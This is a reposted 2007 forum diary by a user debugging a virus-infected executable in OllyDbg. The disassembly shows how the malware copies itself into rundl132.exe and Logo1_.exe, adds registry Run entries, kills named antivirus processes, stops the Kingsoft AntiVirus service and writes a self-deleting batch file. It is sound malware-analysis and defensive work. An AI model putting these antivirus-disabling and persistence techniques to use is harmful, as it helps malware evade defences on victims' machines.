Title:
[Repost] Virus Analysis Diary (1)
Author:
yongmin
Time:
2007-1-24 22:55
Title: Virus Analysis Diary (1)
Author: 小娃崽
Time: 2007-01-11, 13:21
Link: http://bbs.pediy.com/showthread.php?threadid=37783

Right after reinstalling the system, I played 泡泡堂 for a while and used QQ for a bit, and then the virus was back! A freshly installed system already has a virus; could the install disc itself carry it? Today I wanted to use LordPE to look at the sections of some program, and the moment I ran LordPE the machine froze and Task Manager showed a pile of new processes... Suspicious. Then I noticed that the LordPE program's icon had disappeared. Had it been infected? Later I found that almost all of the EXE programs under D:, E: and F: had lost their icons... I did not bother checking the system drive, it had just been installed!

Below is what I listed; put them all on the blacklist! They all also appear in the registry's startup entries.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
c:\windows\uninst\rundl132.exe
C:\Program Files\Microsoft\svhost32.exe
C:\Documents and Settings\huyuytyt\Local Settings\Temp\wlzs.exe
C:\Documents and Settings\huyuytyt\Local Settings\Temp\mhs2.exe
c:\windows\SMSS.EXE
c:\windows\LOGO1_.EXE
c:\windows\SYSTEM32\iexp1ore.exe
c:\windows\SYSTEM32\expiorer.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows load=?粓? ?    (this one looks very suspicious too!!!!!!!!!)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

I went straight to PEDIY (看雪) to download LordPE and picked a few programs at random to look at their sections.

============================================================================================
ollydbg, ollyice, loaddll and many other exes all look like this:

Name   VOFFSET  VSIZE    ROFFSET  RSIZE    Flags
cc870  00001000 0002c000 00000200 00000000 E0000060
cc871  00002d00 0000e000 00000200 0000e000 E0000060
cc872  0003b000 00001034 0000e200 00000301 E0000060

The entry point is always: 0002F86F
=============================================================================================

How to analyse it? I went back to PEDIY and downloaded an OllyDbg to run it, because I don't know how to split off the suspicious sections and restore the code. The target is my own seh.exe (infected), because the source of that program is still around... I know what code I wrote in it!! I traced through the code once and couldn't trace anything... Encrypted??? Let's see what functions it has!!!

Names in seh
Address  Section Type   Name                    Comment
0042D084 cc871   Import KERNEL32.CloseHandle
0042D07C cc871   Import KERNEL32.CreateFileA
0042D088 cc871   Import KERNEL32.ExitProcess
0042D068 cc871   Import KERNEL32.GetProcAddress
0042D078 cc871   Import KERNEL32.GetTempPathA
0042D064 cc871   Import KERNEL32.LoadLibraryA
0042D070 cc871   Import KERNEL32.VirtualAlloc
0042D074 cc871   Import KERNEL32.VirtualFree
0042D06C cc871   Import KERNEL32.VirtualProtect
0042D080 cc871   Import KERNEL32.WriteFile
0042F86F cc871   Export <ModuleEntryPoint>

Fortunately there aren't many. I chose to set a breakpoint, bp CreateFileA, and noticed something interesting: the lower-left corner of OD showed reads of [7*******]; after a great many 7******* addresses flew past, it finally stopped.

0012FE24 00404AD7 /CALL to CreateFileA
0012FE28 009A14C8 |FileName = "C:\WINDOWS\system32\\drivers\etc\hosts"
0012FE2C C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0012FE30 00000000 |ShareMode = 0
0012FE34 00000000 |pSecurity = NULL
0012FE38 00000003 |Mode = OPEN_EXISTING
0012FE3C 00000080 |Attributes = NORMAL
0012FE40 00000000 \hTemplateFile = NULL

Then I hammered F8 all the way to here; everything before this seemed to be operations on the hosts file.

00408C?? 55             push ebp
00408CBD 8BEC           mov ebp, esp
00408CBF 81C4 A0FEFFFF  add esp, -160
#### omitted ####
00408D55 E8 2ABDFFFF    call 00404A84                  // step into
{
00404A84 53             push ebx
#### omitted ####
00404AD2 E8 85F7FFFF    call 0040425C                  ; jmp to kernel32.CreateFileA
00404AD7 5F             pop edi
00404AD8 5E             pop esi
00404AD9 5B             pop ebx
00404ADA C3             retn
Stack shows:
0012FE04 009A13F0 |FileName = "C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷seh.exe"
0012FE08 80000000 |Access = GENERIC_READ
0012FE0C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012FE10 00000000 |pSecurity = NULL
0012FE14 00000003 |Mode = OPEN_EXISTING
0012FE18 00000080 |Attributes = NORMAL
0012FE1C 00000000 \hTemplateFile = NULL
}                                                      // opens its own file
00408D5A 8BF0           mov esi, eax
00408D5C 83FE FF        cmp esi, -1                    // did the open fail?
00408D5F 0F84 94000000  je 00408DF9
00408D65 6A 00          push 0
00408D67 8D45 F0        lea eax, dword ptr [ebp-10]
00408D6A 50             push eax
00408D6B 68 00010000    push 100
00408D70 8D85 DCFEFFFF  lea eax, dword ptr [ebp-124]
00408D76 50             push eax
00408D77 56             push esi
00408D78 E8 47B6FFFF    call 004043C4                  ; jmp to kernel32.ReadFile
Look at the stack:
0012FE1C 00000060 |hFile = 00000060 (window)
0012FE20 0012FE84 |Buffer = 0012FE84
0012FE24 00000100 |BytesToRead = 100 (256.)
0012FE28 0012FF98 |pBytesRead = 0012FF98
0012FE2C 00000000 \pOverlapped = NULL
// reads 256 bytes...
00408D7D 85C0           test eax, eax                  // read failed?
00408D7F 74 72          je short 00408DF3
00408D81 817D F0 0001000>cmp dword ptr [ebp-10], 100   // not 100h bytes?
00408D88 75 69          jnz short 00408DF3
00408D8A 8D85 0CFFFFFF  lea eax, dword ptr [ebp-F4]    // [ebp-F4] = E501
00408D90 8B00           mov eax, dword ptr [eax]
00408D92 A3 A0294100    mov dword ptr [4129A0], eax
00408D97 68 00000001    push 1000000                   // 1000000 (16777216.)
00408D9C 6A 00          push 0                         // GMEM_FIXED
00408D9E E8 C9B5FFFF    call 0040436C                  ; jmp to kernel32.GlobalAlloc // allocate 1000000h bytes of fixed memory
00408DA3 A3 90294100    mov dword ptr [412990], eax
00408DA8 813D A0294100 0>cmp dword ptr [4129A0], 1000000 // compare eax (E501) with 1000000h
00408DB2 7F 3F          jg short 00408DF3
00408DB4 A1 A0294100    mov eax, dword ptr [4129A0]
00408DB9 E8 CE96FFFF    call 0040248C
00408DBE A3 94294100    mov dword ptr [412994], eax
00408DC3 33C9           xor ecx, ecx
00408DC5 33D2           xor edx, edx
00408DC7 8BC6           mov eax, esi                   // eax = esi = 60h
00408DC9 E8 FABAFFFF    call 004048C8                  // step into
{
004048C8 51             push ecx                       // 0
004048C9 6A 00          push 0                         // 0
004048CB 52             push edx                       // 0
004048CC 50             push eax                       // hFile = 60h
004048CD E8 12FBFFFF    call 004043E4                  ; jmp to kernel32.SetFilePointer
004048D2 C3             retn                           // move the file pointer to the start of the file, return
}
00408DCE 6A 00          push 0                         // pOverlapped = NULL
00408DD0 8D45 F0        lea eax, dword ptr [ebp-10]
00408DD3 50             push eax                       // pBytesRead = 0012FF98
00408DD4 A1 A0294100    mov eax, dword ptr [4129A0]
00408DD9 50             push eax                       // BytesToRead = E501 (58625.)
00408DDA A1 94294100    mov eax, dword ptr [412994]
00408DDF 50             push eax                       // Buffer = 009A142C
00408DE0 56             push esi                       // hFile = 00000060 (window)
00408DE1 E8 DEB5FFFF    call 004043C4                  ; jmp to kernel32.ReadFile // reads E501 bytes...
00408DE6 8B45 F0        mov eax, dword ptr [ebp-10]    // E501 into eax
00408DE9 3B05 A0294100  cmp eax, dword ptr [4129A0]    // check whether E501 bytes were read
00408DEF 75 02          jnz short 00408DF3
00408DF1 B3 01          mov bl, 1
00408DF3 56             push esi
00408DF4 E8 43B4FFFF    call 0040423C                  ; jmp to kernel32.CloseHandle
00408DF9 84DB           test bl, bl
00408DFB 0F84 5D030000  je 0040915E
00408E01 E8 866E0000    call 0040FC8C                  // step into
{
0040FC8C 53             push ebx
0040FC8D 33DB           xor ebx, ebx
0040FC8F 68 F0FC4000    push 0040FCF0                  // MappingName = "渝磲痂矧逋逋逋"
0040FC94 6A 00          push 0                         // InheritHandle = FALSE
0040FC96 6A 06          push 6                         // Access = 6
0040FC98 E8 1747FFFF    call 004043B4                  ; jmp to kernel32.OpenFileMappingA
0040FC9D A3 98294100    mov dword ptr [412998], eax
0040FCA2 833D 98294100 0>cmp dword ptr [412998], 0
0040FCA9 74 04          je short 0040FCAF
0040FCAB B3 01          mov bl, 1
0040FCAD EB 1C          jmp short 0040FCCB
0040FCAF 68 F0FC4000    push 0040FCF0                  // MapName = "渝磲痂矧逋逋逋"
0040FCB4 68 54400000    push 4054                      // MaximumSizeLow = 4054
0040FCB9 6A 00          push 0                         // MaximumSizeHigh = 0
0040FCBB 6A 04          push 4                         // Protection = PAGE_READWRITE
0040FCBD 6A 00          push 0                         // pSecurity = NULL
0040FCBF 6A FF          push -1                        // hFile = FFFFFFFF
0040FCC1 E8 9E45FFFF    call 00404264                  ; jmp to kernel32.CreateFileMappingA
0040FCC6 A3 98294100    mov dword ptr [412998], eax
0040FCCB 6A 00          push 0
0040FCCD 6A 00          push 0
0040FCCF 6A 00          push 0
0040FCD1 6A 06          push 6
0040FCD3 A1 98294100    mov eax, dword ptr [412998]
0040FCD8 50             push eax
0040FCD9 E8 C646FFFF    call 004043A4                  ; jmp to kernel32.MapViewOfFile
0040FCDE A3 9C294100    mov dword ptr [41299C], eax
0040FCE3 84DB           test bl, bl
0040FCE5 75 05          jnz short 0040FCEC
0040FCE7 E8 A8070000    call 00410494                  // I'm not yet clear on the assignments inside this call
0040FCEC 8BC3           mov eax, ebx
0040FCEE 5B             pop ebx
0040FCEF C3             retn
}
00408E06 8BD8           mov ebx, eax
00408E08 84DB           test bl, bl
00408E0A 74 64          je short 00408E70              // follow OD's jump
......
00408E70 8B07           mov eax, dword ptr [edi]
00408E72 C740 0C 0100000>mov dword ptr [eax+C], 1
00408E79 E8 12FDFFFF    call 00408B90                  // step into
00408B90 55             push ebp
00408B91 8BEC           mov ebp, esp
00408B93 33C9           xor ecx, ecx
00408B95 51             push ecx
00408B96 51             push ecx
00408B97 51             push ecx
00408B98 51             push ecx
00408B99 51             push ecx
00408B9A 33C0           xor eax, eax
00408B9C 55             push ebp
00408B9D 68 448C4000    push 00408C44
00408BA2 64:FF30        push dword ptr fs:[eax]
00408BA5 64:8920        mov dword ptr fs:[eax], esp
00408BA8 E8 8BE6FFFF    call 00407238                  // step into
00407238 55             push ebp
00407239 8BEC           mov ebp, esp
0040723B B9 05000000    mov ecx, 5
00407240 6A 00          push 0
00407242 6A 00          push 0
00407244 49             dec ecx
00407245 ^ 75 F9        jnz short 00407240
00407247 33C0           xor eax, eax
00407249 55             push ebp
0040724A 68 5A734000    push 0040735A
0040724F 64:FF30        push dword ptr fs:[eax]
00407252 64:8920        mov dword ptr fs:[eax], esp
00407255 8D55 FC        lea edx, dword ptr [ebp-4]
00407258 B8 70734000    mov eax, 00407370              ; ASCII "裔鐾镱"
0040725D E8 5EDAFFFF    call 00404CC0
00407262 8B45 FC        mov eax, dword ptr [ebp-4]     ; RavMon.exe
00407265 E8 9EC2FFFF    call 00403508
0040726A 50             push eax
0040726B 8D55 F8        lea edx, dword ptr [ebp-8]
0040726E B8 84734000    mov eax, 00407384              ; ASCII "裔鐾镱渺狍?
00407273 E8 48DAFFFF    call 00404CC0
00407278 8B45 F8        mov eax, dword ptr [ebp-8]     ; RavMonClass
0040727B E8 88C2FFFF    call 00403508
00407280 50             push eax
00407281 E8 26D2FFFF    call 004044AC                  ; jmp to user32.FindWindowA // FindWindowA(RavMonClass, RavMon.exe)
00407286 6A 00          push 0
00407288 6A 00          push 0
0040728A 6A 10          push 10
0040728C 50             push eax
0040728D E8 62D2FFFF    call 004044F4                  ; jmp to user32.SendMessageA // send the close message
00407292 8D55 F4        lea edx, dword ptr [ebp-C]
00407295 B8 98734000    mov eax, 00407398              ; ASCII "徘认釉嘏"
0040729A E8 21DAFFFF    call 00404CC0
0040729F 8B45 F4        mov eax, dword ptr [ebp-C]     ; "EGHOST.EXE"
004072A2 E8 B9020000    call 00407560
004072A7 8D55 F0        lea edx, dword ptr [ebp-10]
004072AA B8 AC734000    mov eax, 004073AC              ; ASCII "土商拖萎咆?
004072AF E8 0CDAFFFF    call 00404CC0
004072B4 8B45 F0        mov eax, dword ptr [ebp-10]    ; "MAILMON.EXE"
004072B7 E8 A4020000    call 00407560
004072BC 8D55 EC        lea edx, dword ptr [ebp-14]
004072BF B8 C0734000    mov eax, 004073C0
004072C4 E8 F7D9FFFF    call 00404CC0
004072C9 8B45 EC        mov eax, dword ptr [ebp-14]    ; "KAVPFW.EXE"
004072CC E8 8F020000    call 00407560
004072D1 8D55 E8        lea edx, dword ptr [ebp-18]
004072D4 B8 D4734000    mov eax, 004073D4              ; ASCII "尚烈拖耶咆?
004072D9 E8 E2D9FFFF    call 00404CC0
004072DE 8B45 E8        mov eax, dword ptr [ebp-18]    ; "IPARMOR.EXE"
004072E1 E8 7A020000    call 00407560
004072E6 8D55 E4        lea edx, dword ptr [ebp-1C]
004072E9 B8 E8734000    mov eax, 004073E8              ; ASCII "裔鲰镱洚咆?
004072EE E8 CDD9FFFF    call 00404CC0
004072F3 8B45 E4        mov eax, dword ptr [ebp-1C]    ; "Ravmond.EXE"
004072F6 E8 65020000    call 00407560
004072FB 8D55 E0        lea edx, dword ptr [ebp-20]
004072FE B8 FC734000    mov eax, 004073FC              ; ASCII "蝈珞鲢"
00407303 E8 B8D9FFFF    call 00404CC0
00407308 8B45 E0        mov eax, dword ptr [ebp-20]    ; "regsvc.exe"
0040730B E8 50020000    call 00407560
00407310 8D55 DC        lea edx, dword ptr [ebp-24]
00407313 B8 70734000    mov eax, 00407370              ; ASCII "裔鐾镱"
00407318 E8 A3D9FFFF    call 00404CC0
0040731D 8B45 DC        mov eax, dword ptr [ebp-24]    ; "RavMon.exe"
00407320 E8 3B020000    call 00407560
00407325 8D55 D8        lea edx, dword ptr [ebp-28]
00407328 B8 10744000    mov eax, 00407410              ; ASCII "磴箬殄熹"
0040732D E8 8ED9FFFF    call 00404CC0
00407332 8B45 D8        mov eax, dword ptr [ebp-28]    ; "mcshield.exe"
00407335 E8 26020000    call 00407560
0040733A E8 39FEFFFF    call 00407178
0040733F 33C0           xor eax, eax
00407341 5A             pop edx
00407342 59             pop ecx
00407343 59             pop ecx
00407344 64:8910        mov dword ptr fs:[eax], edx
00407347 68 61734000    push 00407361
0040734C 8D45 D8        lea eax, dword ptr [ebp-28]
0040734F BA 0A000000    mov edx, 0A
00407354 E8 3FBEFFFF    call 00403198
00407359 C3             retn

// call 00404CC0 is the decryption function; it decrypts the garbled strings.
// call 00407560 is a routine that kills a named process: it first uses the process snapshot functions Process32First, Process32Next, CreateToolhelp32Snapshot etc. to enumerate whether any of the following processes exist:
0012FDD8 009A0FD0 ASCII "mcshield.exe"
0012FDDC 009A1084 ASCII "RavMon.exe"
0012FDE0 009A1170 ASCII "regsvc.exe"
0012FDE4 009A1290 ASCII "Ravmond.EXE"
0012FDE8 009A01CC ASCII "IPARMOR.EXE"
0012FDEC 009A0364 ASCII "KAVPFW.EXE"
0012FDF0 009A053C ASCII "MAILMON.EXE"
0012FDF4 009A09C0 ASCII "EGHOST.EXE"
0012FDF8 009A0950 ASCII "RavMonClass"
0012FDFC 009A08E4 ASCII "RavMon.exe"
// if one is found, it kills it with OpenProcess and TerminateProcess.

00408BAD 8D55 F8        lea edx, dword ptr [ebp-8]
00408BB0 B8 588C4000    mov eax, 00408C58              ; ASCII "酥惋钬挟素?
00408BB5 E8 06C1FFFF    call 00404CC0
00408BBA 8B45 F8        mov eax, dword ptr [ebp-8]     ; "KVMonXP.KXP
00408BBD E8 9EE9FFFF    call 00407560
00408BC2 8D55 F4        lea edx, dword ptr [ebp-C]
00408BC5 B8 6C8C4000    mov eax, 00408C6C              ; ASCII "艘彗砒"
00408BCA E8 F1C0FFFF    call 00404CC0
00408BCF 8B45 F4        mov eax, dword ptr [ebp-C]     ; "KRegEx.exe"
00408BD2 E8 89E9FFFF    call 00407560
00408BD7 8D55 F0        lea edx, dword ptr [ebp-10]
00408BDA B8 808C4000    mov eax, 00408C80              ; ASCII "酥匦匦"
00408BDF E8 DCC0FFFF    call 00404CC0
00408BE4 8B45 F0        mov eax, dword ptr [ebp-10]    ; "KVXP.KXP"
00408BE7 E8 74E9FFFF    call 00407560
00408BEC 6A 00          push 0
00408BEE 8D55 EC        lea edx, dword ptr [ebp-14]
00408BF1 B8 948C4000    mov eax, 00408C94
00408BF6 E8 C5C0FFFF    call 00404CC0
00408BFB 8B45 EC        mov eax, dword ptr [ebp-14]    ; "net stop ""Kingsoft AntiVirus Service""
00408BFE E8 05A9FFFF    call 00403508
00408C03 50             push eax
00408C04 E8 33B8FFFF    call 0040443C                  ; jmp to kernel32.WinExec
00408C09 8D45 FC        lea eax, dword ptr [ebp-4]
00408C0C 50             push eax
00408C0D 6A 00          push 0
00408C0F 6A 00          push 0
00408C11 68 008B4000    push 00408B00
00408C16 6A 00          push 0
00408C18 6A 00          push 0
00408C1A E8 55B6FFFF    call 00404274                  ; jmp to kernel32.CreateThread
// same as above, and it also executes WinExec("net stop ""Kingsoft AntiVirus Service""", SW_HIDE)
// and creates a thread

0040856B 64:8920        mov dword ptr fs:[eax], esp
0040856E 8D45 F4        lea eax, dword ptr [ebp-C]
00408571 E8 2EF9FFFF    call 00407EA4                  ; get system directory
00408576 8B55 F4        mov edx, dword ptr [ebp-C]
00408579 8D45 FC        lea eax, dword ptr [ebp-4]
0040857C B9 6C864000    mov ecx, 0040866C              ; ASCII "uninstall\"
00408581 E8 CEADFFFF    call 00403354                  ; concatenate
00408586 8B45 FC        mov eax, dword ptr [ebp-4]
00408589 E8 72C5FFFF    call 00404B00
0040858E 84C0           test al, al
00408590 75 10          jnz short 004085A2
00408592 6A 00          push 0
00408594 8B45 FC        mov eax, dword ptr [ebp-4]
00408597 E8 6CAFFFFF    call 00403508
0040859C 50             push eax
0040859D E8 B2BCFFFF    call 00404254                  ; jmp to kernel32.CreateDirectoryA
004085A2 8D55 F0        lea edx, dword ptr [ebp-10]
004085A5 B8 80864000    mov eax, 00408680
004085AA E8 11C7FFFF    call 00404CC0
004085AF 8B55 F0        mov edx, dword ptr [ebp-10]    ; "rundl132.exe"
004085B2 8D45 FC        lea eax, dword ptr [ebp-4]
004085B5 E8 56ADFFFF    call 00403310
004085BA 8B45 FC        mov eax, dword ptr [ebp-4]     ; C:\WINDOWS\uninstall\rundl132.exe
004085BD E8 12C3FFFF    call 004048D4                  ; stepping in shows it is CreateFileA
004085C2 8BD8           mov ebx, eax
004085C4 83FB FF        cmp ebx, -1                    ; creation failed?
004085C7 74 1E          je short 004085E7
004085C9 6A 00          push 0
004085CB 8D45 F8        lea eax, dword ptr [ebp-8]
004085CE 50             push eax
004085CF A1 A0294100    mov eax, dword ptr [4129A0]
004085D4 50             push eax
004085D5 A1 94294100    mov eax, dword ptr [412994]
004085DA 50             push eax
004085DB 53             push ebx
004085DC E8 63BEFFFF    call 00404444                  ; jmp to kernel32.WriteFile
004085E1 53             push ebx
004085E2 E8 55BCFFFF    call 0040423C                  ; jmp to kernel32.CloseHandle
004085E7 8B45 FC        mov eax, dword ptr [ebp-4]     ; C:\WINDOWS\uninstall\rundl132.exe
004085EA E8 85C4FFFF    call 00404A74
004085EF 84C0           test al, al
004085F1 74 41          je short 00408634
004085F3 8B45 FC        mov eax, dword ptr [ebp-4]
004085F6 E8 0DAFFFFF    call 00403508
004085FB 50             push eax
004085FC 8D55 EC        lea edx, dword ptr [ebp-14]
004085FF B8 98864000    mov eax, 00408698              ; ASCII "祜徜"
00408604 E8 B7C6FFFF    call 00404CC0
00408609 8B45 EC        mov eax, dword ptr [ebp-14]    ; load
0040860C E8 F7AEFFFF    call 00403508
00408611 50             push eax
00408612 8D55 E8        lea edx, dword ptr [ebp-18]
00408615 B8 A8864000    mov eax, 004086A8
0040861A E8 A1C6FFFF    call 00404CC0
0040861F 8B45 E8        mov eax, dword ptr [ebp-18]    ; "Software\Microsoft\Windows\CurrentVersion\Run")
00408622 E8 E1AEFFFF    call 00403508                  ; write registry

===================================================================================================================
Summary 1: at this point I know the program reads its own first E501 bytes, writes them into the file C:\WINDOWS\uninstall\rundl132.exe, and adds it to the registry startup entries.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows load=?粓? ?
This should also correspond to rundl132.exe.

Meanwhile the program kills common anti-virus software and stops the Kingsoft AntiVirus Service.

In the thread it creates at 00408B00, I found functions such as winmm.waveOutSetVolume (my MP3 suddenly went mute; are these functions the culprit? heh), plus code that uses FindWindow to look for avp.exe and SendMessage to close it.

Continuing to follow OD, I arrived here:

00407F2F E8 50CBFFFF    call 00404A84                  ; open its own file
00407F34 8BF0           mov esi, eax
00407F36 83FE FF        cmp esi, -1
00407F39 0F84 E1030000  je 00408320                    ; failed?
00407F3F 6A 00          push 0
00407F41 56             push esi
00407F42 E8 C5C3FFFF    call 0040430C                  ; jmp to kernel32.GetFileSize
00407F47 3B05 A0294100  cmp eax, dword ptr [4129A0]    ; file size - E501
00407F4D 0F9FC3         setg bl
00407F50 84DB           test bl, bl
00407F52 0F84 C2030000  je 0040831A
00407F58 8D95 64FDFFFF  lea edx, dword ptr [ebp-29C]
00407F5E B8 64834000    mov eax, 00408364              ; ASCII ""
00407F63 E8 58CDFFFF    call 00404CC0
00407F68 8B85 64FDFFFF  mov eax, dword ptr [ebp-29C]   ; ".EXE"
00407F6E 50             push eax
00407F6F 8D95 60FDFFFF  lea edx, dword ptr [ebp-2A0]
00407F75 33C0           xor eax, eax
00407F77 E8 A0A7FFFF    call 0040271C
00407F7C 8B95 60FDFFFF  mov edx, dword ptr [ebp-2A0]
00407F82 8D45 EC        lea eax, dword ptr [ebp-14]
00407F85 59             pop ecx
00407F86 E8 C9B3FFFF    call 00403354
00407F8B 8B45 EC        mov eax, dword ptr [ebp-14]
00407F8E E8 75B5FFFF    call 00403508
00407F93 50             push eax                       ; "C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe"
00407F94 E8 E3C2FFFF    call 0040427C                  ; jmp to kernel32.DeleteFileA // delete it first, otherwise the functions below fail easily!
00407F99 8B45 EC        mov eax, dword ptr [ebp-14]
00407F9C E8 D3CAFFFF    call 00404A74
00407FA1 84C0           test al, al
00407FA3 0F85 71030000  jnz 0040831A
00407FA9 8B45 EC        mov eax, dword ptr [ebp-14]
00407FAC E8 23C9FFFF    call 004048D4
{
......
004048D7 6A 00          push 0
004048D9 68 80000000    push 80
004048DE 6A 02          push 2
004048E0 6A 00          push 0
004048E2 6A 00          push 0
004048E4 68 000000C0    push C0000000
004048E9 8BC3           mov eax, ebx
004048EB E8 18ECFFFF    call 00403508
004048F0 50             push eax                       |FileName = "C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe"
004048F1 E8 66F9FFFF    call 0040425C                  ; jmp to kernel32.CreateFileA
004048F6 5B             pop ebx
004048F7 C3             retn
// creates a file; its name is just the program's own name plus an extra .exe
}
00407FB1 8BF8           mov edi, eax
00407FB3 83FF FF        cmp edi, -1
00407FB6 0F84 5E030000  je 0040831A
00407FBC 8D45 CC        lea eax, dword ptr [ebp-34]
00407FBF 50             push eax
00407FC0 8D45 D4        lea eax, dword ptr [ebp-2C]
00407FC3 50             push eax
00407FC4 8D45 DC        lea eax, dword ptr [ebp-24]
00407FC7 50             push eax
00407FC8 56             push esi
00407FC9 E8 46C3FFFF    call 00404314                  ; jmp to kernel32.GetFileTime
00407FCE 8D45 E4        lea eax, dword ptr [ebp-1C]
00407FD1 BA 74834000    mov edx, 00408374
00407FD6 E8 31B2FFFF    call 0040320C
00407FDB 8D85 58FDFFFF  lea eax, dword ptr [ebp-2A8]
00407FE1 B9 84834000    mov ecx, 00408384              ; ASCII "边"
00407FE6 8B55 E4        mov edx, dword ptr [ebp-1C]
00407FE9 E8 66B3FFFF    call 00403354
00407FEE 8B85 58FDFFFF  mov eax, dword ptr [ebp-2A8]
00407FF4 8D95 5CFDFFFF  lea edx, dword ptr [ebp-2A4]
00407FFA E8 C1CCFFFF    call 00404CC0
00407FFF 8B85 5CFDFFFF  mov eax, dword ptr [ebp-2A4]   ; "Logo1_.exe"
00408005 50             push eax
00408006 8D85 54FDFFFF  lea eax, dword ptr [ebp-2AC]
0040800C E8 93FEFFFF    call 00407EA4                  ; get system directory
00408011 8B95 54FDFFFF  mov edx, dword ptr [ebp-2AC]   ; system directory -> EDX
00408017 8D45 F0        lea eax, dword ptr [ebp-10]
0040801A 59             pop ecx
0040801B E8 34B3FFFF    call 00403354                  ; concatenate
00408020 8B45 F0        mov eax, dword ptr [ebp-10]    ; "C:\WINDOWS\Logo1_.exe"
00408023 E8 ACC8FFFF    call 004048D4                  ; this call is the file-creation function; the EAX passed in points to the file name
00408052 50             push eax
00408053 A1 90294100    mov eax, dword ptr [412990]
00408058 50             push eax                       ; EAX = E501, read E501 bytes
00408059 56             push esi                       ; hFile = 64, which shows it is its own file
0040805A E8 65C3FFFF    call 004043C4                  ; jmp to kernel32.ReadFile
0040805F 837D F8 00     cmp dword ptr [ebp-8], 0
00408063 74 1D          je short 00408082
00408065 8B45 F8        mov eax, dword ptr [ebp-8]
00408068 2945 F4        sub dword ptr [ebp-C], eax
0040806B 8B15 90294100  mov edx, dword ptr [412990]
00408071 8B4D F8        mov ecx, dword ptr [ebp-8]
00408074 8B45 FC        mov eax, dword ptr [ebp-4]
00408077 E8 7CC8FFFF    call 004048F8                  ; stepping in shows it writes the file
0040807C 837D F4 00     cmp dword ptr [ebp-C], 0
00408080 ^\77 BD        ja short 0040803F
00408082 8B45 FC        mov eax, dword ptr [ebp-4]
00408085 50             push eax
00408086 E8 B1C1FFFF    call 0040423C                  ; jmp to kernel32.CloseHandle // close the file handle!
0040808B C645 CB 01     mov byte ptr [ebp-35], 1
0040808F EB 04          jmp short 00408095
00408091 C645 CB 00     mov byte ptr [ebp-35], 0
00408095 6A 00          push 0                         ; from the start of the file
00408097 6A 00          push 0
00408099 A1 A0294100    mov eax, dword ptr [4129A0]    ; E501 into EAX
0040809E 50             push eax                       ; move the file pointer to E501
0040809F 56             push esi
004080A0 E8 3FC3FFFF    call 004043E4                  ; jmp to kernel32.SetFilePointer
004080A5 6A 00          push 0
004080A7 8D45 F8        lea eax, dword ptr [ebp-8]
004080AA 50             push eax
004080AB 68 00000001    push 1000000                   ; read
004080B0 A1 90294100    mov eax, dword ptr [412990]    ; the
004080B5 50             push eax                       ; file
004080B6 56             push esi
004080B7 E8 08C3FFFF    call 004043C4                  ; jmp to kernel32.ReadFile
004080BC 837D F8 00     cmp dword ptr [ebp-8], 0
004080C0 74 12          je short 004080D4
004080C2 8B15 90294100  mov edx, dword ptr [412990]
004080C8 8B4D F8        mov ecx, dword ptr [ebp-8]     ; [EBP-8] = file size - E501?
004080CB 8BC7           mov eax, edi
004080CD E8 26C8FFFF    call 004048F8                  ; stepping in shows it writes what was read into the file; hFile=64h shows it is writing "C:\Documents and Settings\huyuytyt\",D7,"烂鎈",B2,"",A1,"",B6,"綷MdnPacker.exe.exe", the original name plus .exe
004080D2 ^ EB D1        jmp short 004080A5
004080D4 8D45 CC        lea eax, dword ptr [ebp-34]
004080D7 50             push eax
004080D8 8D45 D4        lea eax, dword ptr [ebp-2C]
004080DB 50             push eax
004080DC 8D45 DC        lea eax, dword ptr [ebp-24]
004080DF 50             push eax
004080E0 57             push edi
004080E1 E8 06C3FFFF    call 004043EC                  ; jmp to kernel32.SetFileTime // restore the file time
004080E6 57             push edi
004080E7 E8 50C1FFFF    call 0040423C                  ; jmp to kernel32.CloseHandle // close the file handle
004080EC C685 C6FEFFFF 0>mov byte ptr [ebp-13A], 0
004080F3 8D85 C6FEFFFF  lea eax, dword ptr [ebp-13A]
004080F9 50             push eax
004080FA 68 04010000    push 104
004080FF E8 40C2FFFF    call 00404344                  ; jmp to kernel32.GetTempPathA
00408104 C685 C1FDFFFF 0>mov byte ptr [ebp-23F], 0
0040810B 8D85 C1FDFFFF  lea eax, dword ptr [ebp-23F]
00408111 50             push eax
00408112 6A 00          push 0
00408114 8D95 50FDFFFF  lea edx, dword ptr [ebp-2B0]
0040811A B8 94834000    mov eax, 00408394
0040811F E8 9CCBFFFF    call 00404CC0
00408124 8B85 50FDFFFF  mov eax, dword ptr [ebp-2B0]
0040812A E8 D9B3FFFF    call 00403508
0040812F 50             push eax
00408130 8D85 C6FEFFFF  lea eax, dword ptr [ebp-13A]
00408136 50             push eax
00408137 E8 00C2FFFF    call 0040433C                  ; jmp to kernel32.GetTempFileNameA
0040813C 8D95 4CFDFFFF  lea edx, dword ptr [ebp-2B4]
00408142 B8 A4834000    mov eax, 004083A4              ; ASCII "狒"
00408147 E8 74CBFFFF    call 00404CC0
0040814C 8B85 4CFDFFFF  mov eax, dword ptr [ebp-2B4]   ; turns out to be .bat
00408152 50             push eax
00408153 8D85 48FDFFFF  lea eax, dword ptr [ebp-2B8]
00408159 8D95 C1FDFFFF  lea edx, dword ptr [ebp-23F]
0040815F B9 05010000    mov ecx, 105
00408164 E8 87B1FFFF    call 004032F0
00408169 8B85 48FDFFFF  mov eax, dword ptr [ebp-2B8]
0040816F 8D4D E8        lea ecx, dword ptr [ebp-18]
00408172 5A             pop edx
00408173 E8 B4C7FFFF    call 0040492C                  ; concatenate strings
00408178 8B45 E8        mov eax, dword ptr [ebp-18]
0040817B E8 88B3FFFF    call 00403508
00408180 50             push eax                       ; "C:\DOCUME~1\huyuytyt\LOCALS~1\Temp\$$aBE.bat")
00408181 E8 F6C0FFFF    call 0040427C                  ; jmp to kernel32.DeleteFileA // delete it first, otherwise it easily fails.
// next it starts writing the batch file... the code is already very long so I won't paste it; just look at the content:

:try1
Del "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe"
